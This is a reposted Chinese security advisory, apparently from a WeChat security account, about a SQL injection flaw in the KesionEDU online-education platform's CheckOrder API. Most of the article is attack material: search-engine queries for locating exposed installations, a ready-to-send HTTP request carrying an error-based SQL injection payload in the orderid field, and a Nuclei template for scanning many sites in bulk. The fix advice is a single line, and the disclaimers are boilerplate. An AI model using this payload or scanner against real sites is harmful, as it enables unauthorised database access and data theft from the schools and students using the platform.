EDU-Kesion科汛开发的在线教育建站系统存在SQL注入漏洞 ( POC新接口)

admin 2024年12月28日12:02:53评论35 views字数 2366阅读7分53秒阅读模式

0x01 产品简介

        科汛网校KesionEDU是KESION科汛开发的在线教育建站系统,支持在线直播教学、课程点播、录播授课等多种教学方式,满足不同场景下的教学需求。提供问答互动、学习点评、在线笔记等功能,增强学员与教师之间的互动交流。拥有在线考试系统,支持单选、多选、问答等多种题型,方便学员进行课后测练和考试。供求职招聘功能,方便教育机构网罗各地人才,增强平台吸引力。提供全方位的技术支持和售后服务,确保教育机构在使用过程中无后顾之忧。是教育机构搭建在线教育平台的理想选择,利用测绘引擎搜索发现影响资产1100+。

POC在末尾下载

EDU-Kesion科汛开发的在线教育建站系统存在SQL注入漏洞 ( POC新接口)

声明

请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。

TIPS: 末尾领取资料及福利-批量检测脚本在末尾

0x02 漏洞描述

SQL注入被广泛用于非法入侵网站服务器,获取网站控制权。它是应用层上的一种安全漏洞。通常在设计存在缺陷的程序中,对用户输入的数据没有做好过滤,导致恶意用户可以构造一些SQL语句让服务器去执行,从而导致数据库中的数据被窃取,篡改,删除,以及进一步导致服务器被入侵等危害。

0x03 Zoomeye语法

http.body="/KS_Inc/static/edu"

EDU-Kesion科汛开发的在线教育建站系统存在SQL注入漏洞 ( POC新接口)

0x04 漏洞复现

request packet(NucleiPOC在末尾)

POST /webapi/APP/CheckOrder HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Content-Length: 242
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Priority: u=0
X-Requested-With: XMLHttpRequest

{"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"}

EDU-Kesion科汛开发的在线教育建站系统存在SQL注入漏洞 ( POC新接口)

Nuclei批量检测POC(末尾有Nuclei批量检测POC)

EDU-Kesion科汛开发的在线教育建站系统存在SQL注入漏洞 ( POC新接口)

‍‍‍

0x05 修复建议

关闭互联网暴露面或接口设置访问权限,官方已经推出新版本,建议升级到最新版。

 

Nuclei-YamlPoc

id: KesionEDU-CheckOrder-SQLi

info:
  name: KesionEDU-CheckOrder-SQLi
  author: HK
  severity: high
  metadata:
    fofa-query: body="/KS_Inc/static/edu"
http:
  - raw:
    - |
      POST /webapi/APP/CheckOrder HTTP/1.1
      Host: 
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
      Accept: application/json, text/javascript, */*; q=0.01
      Priority: u=0
      Accept-Encoding: gzip, deflate
      X-Requested-With: XMLHttpRequest
       
      {"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"}

    matchers-condition: and
    matchers:
      - type: word
        words:
        - "qkpzq1qqkkq"
      - type: status
        status:
        - 500
 

原文始发于微信公众号(渗透安全HackTwo):EDU-Kesion科汛开发的在线教育建站系统存在SQL注入漏洞 (大量存在含POC新接口) | 漏洞预警

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月28日12:02:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   EDU-Kesion科汛开发的在线教育建站系统存在SQL注入漏洞 ( POC新接口)https://cn-sec.com/archives/3561887.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息